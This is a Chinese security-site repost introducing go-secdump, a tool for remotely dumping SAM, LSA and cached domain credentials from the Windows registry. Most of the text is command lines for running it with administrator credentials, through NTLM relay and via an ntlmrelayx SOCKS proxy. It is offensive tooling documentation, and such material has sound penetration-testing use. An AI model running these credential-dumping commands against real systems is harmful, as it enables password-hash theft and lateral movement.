go-secdump:从Windows注册表远程转储哈希的工具

admin 2025年4月21日00:27:22评论7 views字数 1089阅读3分37秒阅读模式

免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

GitHub - jfjallid/go-secdump :从Windows注册表远程转储机密的工具

地址:https://github.com/jfjallid/go-secdump

使用 SeBackupPrivilege 技巧转储所有注册表密钥:

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --localor./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

仅转储 SAM、LSA 或 DCC2 缓存密钥:

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

使用 NTLM 中继转储注册表机密, Start listener启动侦听器

./go-secdump --host 192.168.0.100 -n --relay

使用上游 SOCKS5 代理转储密钥以进行透视或获取 Impacket ntlmrelayx.py SOCKS 服务器功能的优势使用 ntlmrelayx.py 作为上游代理时,提供的用户名必须匹配 已验证的客户端的密码,但密码可以为空

./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server..../go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080
go-secdump:从Windows注册表远程转储哈希的工具

原文始发于微信公众号(Z1sec):go-secdump:从Windows注册表远程转储哈希的工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月21日00:27:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   go-secdump:从Windows注册表远程转储哈希的工具https://cn-sec.com/archives/3979839.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息